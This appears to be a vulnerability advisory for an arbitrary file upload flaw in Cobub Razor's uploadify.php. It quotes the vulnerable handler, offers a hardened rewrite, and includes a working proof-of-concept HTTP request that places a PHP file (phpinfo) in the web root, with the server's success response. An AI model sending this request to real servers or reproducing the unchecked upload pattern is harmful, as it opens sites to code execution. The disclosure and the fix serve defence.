Vulnerability: Cobub Razor file upload

Detail:

/web/assets/swf/uploadify.php, line 26: the handler only checks whether $_FILES is empty, then builds the target path as document root + the request's `folder` parameter + the uploaded file's original name, and moves the upload there. The file type is not restricted (the extension check is commented out), so any file name, including `.php`, is written under the web root.

    if (!empty($_FILES)) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        // Destination directory comes straight from the request's 'folder' parameter
        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
        // Destination file name is the client-supplied original name, unchanged
        $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

        // The extension check that would restrict file types is commented out:
        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
        // $fileTypes  = str_replace(';','|',$fileTypes);
        // $typesArray = split('\|',$fileTypes);
        // $fileParts  = pathinfo($_FILES['Filedata']['name']);

        // if (in_array($fileParts['extension'],$typesArray)) {
            // Uncomment the following line if you want to make the directory if it doesn't exist
            // mkdir(str_replace('//','/',$targetPath), 0755, true);

            move_uploaded_file($tempFile,$targetFile);
            echo $targetFile;
        // }
    }
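A hardened version of the handler above, added here as an example and not Cobub Razor's own fix: the destination directory is fixed server-side instead of taken from `folder`, the stored file name is generated, the extension and the sniffed MIME type are allowlisted, and only PHP-managed uploads are accepted. It assumes PHP 7+ with the fileinfo extension and an `uploads` directory beside the script (both assumptions, not from the original).

```php
<?php
// Added hardened rewrite of the upload handler, not Cobub Razor's own code.
// Assumes uploads belong in one fixed directory and only images are expected.
$uploadBase  = __DIR__ . '/uploads';   // fixed; the client no longer chooses the folder
$allowedExt  = ['jpg', 'jpeg', 'png', 'gif'];
$allowedMime = ['image/jpeg', 'image/png', 'image/gif'];

function fail(int $status, string $msg): void {
    http_response_code($status);
    exit($msg);
}

if (empty($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
    fail(400, 'no file');
}
$tempFile = $_FILES['Filedata']['tmp_name'];
// Only accept a file that arrived through PHP's own upload mechanism.
if (!is_uploaded_file($tempFile)) {
    fail(400, 'invalid upload');
}
// Allowlist the extension of the client-supplied name, but never reuse that name on disk.
$ext = strtolower(pathinfo($_FILES['Filedata']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    fail(415, 'file type not allowed');
}
// Sniff the real content type; the multipart Content-Type header is client-chosen.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tempFile);
if (!in_array($mime, $allowedMime, true)) {
    fail(415, 'content does not match an allowed type');
}
if (!is_dir($uploadBase) && !mkdir($uploadBase, 0755, true)) {
    fail(500, 'upload directory unavailable');
}
// Server-generated name: the request cannot pick 'phpinfo.php' or any path component.
$targetFile = $uploadBase . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($tempFile, $targetFile)) {
    fail(500, 'upload failed');
}
// Return only the stored name; the original echoed the full filesystem path.
echo basename($targetFile);
```

As an independent second layer, serve the upload directory with script execution disabled in the web server configuration, so a file that slips past the checks is still never interpreted as PHP.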

POC:

Construct an upload POST:

    POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------18467633426500
    Content-Length: 213
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------18467633426500
    Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
    Content-Type: image/jpeg
    
    <?php phpinfo();?>
    -----------------------------18467633426500

Upload success:

    HTTP/1.1 200 OK
    Date: Fri, 29 Mar 2019 04:33:23 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
    X-Powered-By: PHP/5.6.27
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 57
    
    D:/***/***/WWW/razor/web/phpinfo.php

Result:
